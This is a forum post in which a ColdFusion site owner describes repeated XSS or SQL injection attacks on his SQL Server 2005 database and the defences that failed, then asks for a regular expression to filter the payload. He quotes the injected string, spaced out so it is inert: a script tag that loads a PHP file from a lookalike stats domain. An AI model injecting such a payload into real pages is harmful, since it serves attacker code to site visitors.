Reguler Expression Help
My site is obviously CF and im using sql server 2005 for my database and I have been getting hacked for a couple of days now.
XSS or sql injections and I cant seem to stop it.
I've added portcullis.cfc which is suppose to shop xss and sal injections but it didnt help, I get an email for portcullis stating a user was blocked but the DB is still modified
I changed all cfquerys to stored procedures which I was under the impression would help but nothing, still hacked this morning.
I've updated the server to the latest patches to no avail.
so my last line of defense is "Regular Expressions", reason its my last is I have no clue how to write one.
The offending scrip thats getting injected is "< / t i t l e > < s c r i p t s r c = h t t p : / / g o o g l e - s t a t s 4 9 . i n f o / u r . p h p > </ s c r i p t>"
now where you see stats49, sometimes it is stat49 and other times the 49 is a completly different number
also, there are no spaces in the script but I added them for this purpose as not to inadverntly run the script from this forum
I would appriciate any help I can get in converting this to a Regular expression so I can filter my input
Regards
Craig Wiseman
